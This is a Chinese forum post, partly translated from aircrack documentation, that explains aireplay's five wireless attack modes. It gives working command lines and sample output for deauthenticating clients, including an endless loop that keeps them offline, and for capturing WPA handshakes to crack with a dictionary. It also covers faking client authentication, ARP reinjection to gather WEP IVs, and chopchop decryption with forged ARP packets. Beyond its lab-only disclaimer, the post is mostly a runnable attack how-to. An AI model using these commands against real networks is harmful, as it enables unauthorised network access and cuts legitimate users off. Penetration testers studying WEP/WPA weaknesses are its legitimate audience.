本文大部分翻译自aircrackpack的作者,仅在实验室环境中测试,请勿用于非法尝试。 有一定经验的人,应该知道aireplay在破解中所起的作用。 如果你在实验中屡屡受挫,下面的内容应对你有用。 aireplay有5种攻击模式,对应于不同情况。下面一一说来: 在下面的例子中,00:13:10:30:24:9C 是AP(无线路由) 的MAC 地址(on channel 6), 00:09:5B:EB:C5:2B 是客户的MAC address + Attack 0: deauthentication 这种攻击模式强制断开客户端与路由端的连接,使其重新连接,在此期间,可以捕获WAP 的handshakes,以及WEP的有效ivs,并产生有效ARP攻击(配合-3攻击)。这在实践中是非常有效的。如果一个客户端连在路由端上,但是没有人上网以产生有效数据,此时,即使用-3(见下面具体内容)也无法产生有效ARP攻击。如果在-3的同时,另外进行-0 攻击,-3攻击会被立刻激活。 显而易见,如果没有客户端是不成的。 Some examples: o WPA Handshake capture with an Atheros airmon.sh start ath0 airodump ath0 out 6 (switch to another console) aireplay -0 5 -a 00:13:10:30:24:9C -c 00:09:5B:EB:C5:2B ath0 (wait for a few seconds) aircrack -w /path/to/dictionary out.cap o ARP request generation with a Prism2 card airmon.sh start wlan0 airodump wlan0 out 6 (switch to another console) aireplay -0 5 -a 00:13:10:30:24:9C wlan0 aireplay -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0 aireplay -0 5 ------进行五次攻击,如果为0,则循环攻击,客户端无法正常上网,不停的断开连接。 -a 后是路由的mac地址。可以加 -h 后为攻击的客户端的mac地址,也可以不加。 wlan0 为自己的网卡名。用ifconfig -a 看,也可以是wifi0,ath1等等。有很多帖子都有叙述,这里就不再多说了。 + Attack 1: fake authentication 这种攻击在没有合法客户端与路由相连时有些用处,这里我们伪装了一个客户端并使之育路由连接。这个操作可以配合 -3 (ARP request reinjection)和 -4 ("chopchop" WEP decryption).使用。如果,有客户端,则针对客户端使用-3 或 -4 更为有效。 实际上,如果没有客户端的话,这种攻击很可能没有效果。 aireplay -1 0 -e myap -a 00:13:10:30:24:9C -h 0:1:2:3:4:5 ath0 12:14:06 Sending Authentication Request 12:14:06 Authentication successful 12:14:06 Sending Association Request 12:14:07 Association successful :-) +---------------------------------------------------------------------+ | With patched madwifi CVS 2005-08-14, it's possible to inject | | packets while in Managed mode (the WEP key itself doesn't matter, | | as long as the AP accepts Open-System authentication). So, instead | | of running attack 1, you may just associate and inject / monitor | | through the athXraw interface: | | | | ifconfig ath0 down hw ether 00:10:20:30:40:50 | | iwconfig ath0 mode Managed essid myap key AAAAAAAAAA | | ifconfig ath0 up | | | | sysctl -w dev.ath0.rawdev=1 | | ifconfig ath0raw up | | airodump ath0raw out 6 | | | | Then you can run attack 3 or 4 (aireplay will automatically replace | | ath0 with ath0raw below): | | | | aireplay -3 -h 00:10:20:30:40:50 -b 00:13:10:30:24:9C ath0 | | aireplay -4 -h 00:10:20:30:40:50 -f 1 ath0 | | | +---------------------------------------------------------------------+ Some access points require to reassociate every 30 seconds, otherwise our fake client is considered disconnected. In this case, setup the periodic re-association delay: aireplay -1 30 -e myap -a 00:13:10:30:24:9C -h 0:1:2:3:4:5 ath0
+ Attack 2: interactive packet replay 这种攻击模式几本无用,只是某些时候做测试用。 aireplay -2 -f 0 -t 1 -d FF:FF:FF:FF:FF:FF -n 90 ath0 + Attack 3: ARP-request reinjection 这种攻击模式是最为有效的。这里你既可以利用合法客户端,也可以配合-1 利用伪装客户端。一般情况下,你需要等几分钟直到出现有效ARP request. 如果没有任何通信存在,则这种攻击就会失败。在实践中,如果合法客户端和路由之间长时间内没有ARP request,可以尝试同时使用-0 攻击。 Please note that you can also reuse ARP requests from a previous capture using the -r switch. aireplay -3 -b 00:13:10:30:24:9C -h 0:1:2:3:4:5 ath0 Saving ARP requests in replay_arp-0627-121526.cap You must also start airodump to capture replies. Read 2493 packets (got 1 ARP requests), sent 1305 packets... + Attack 4: KoreK's "chopchop" (CRC prediction) 这种攻击模式不常用,但是一旦成果,则可以在不知道密码的情况下破解WEP包。 This attack, when successful, can decrypt a WEP data packet without knowing the key. It can even work against dynamic WEP. This attack does not recover the WEP key itself, but merely reveals the plaintext. However, most access points are not vulnerable at all. Some may seem vulnerable at first but actually drop data packets shorter that 60 bytes. This attack requires at least one WEP data packet. 1. First, we decrypt one packet : aireplay -4 -h 00:09:5B:EB:C5:2B ath0 2. Let's have a look at the IP address : tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap reading from file replay_dec-0627-022301.cap, link-type [...] IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1 3. Then, forge an ARP request. The source IP (192.168.1.100) doesn't matter, but the destination IP (192.168.1.2) must respond to ARP requests. The source MAC must belong to an associated station. ./arpforge replay_dec-0627-022301.xor 1 00:13:10:30:24:9C \ 00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap 4. And replay our forged ARP request : aireplay -2 -r arp.cap ath0
———————————————————————— 去除回复可见,并加此贴为精华。Tange/2008.6.4
[此贴子已经被tange于2008-6-4 23:22:40编辑过] |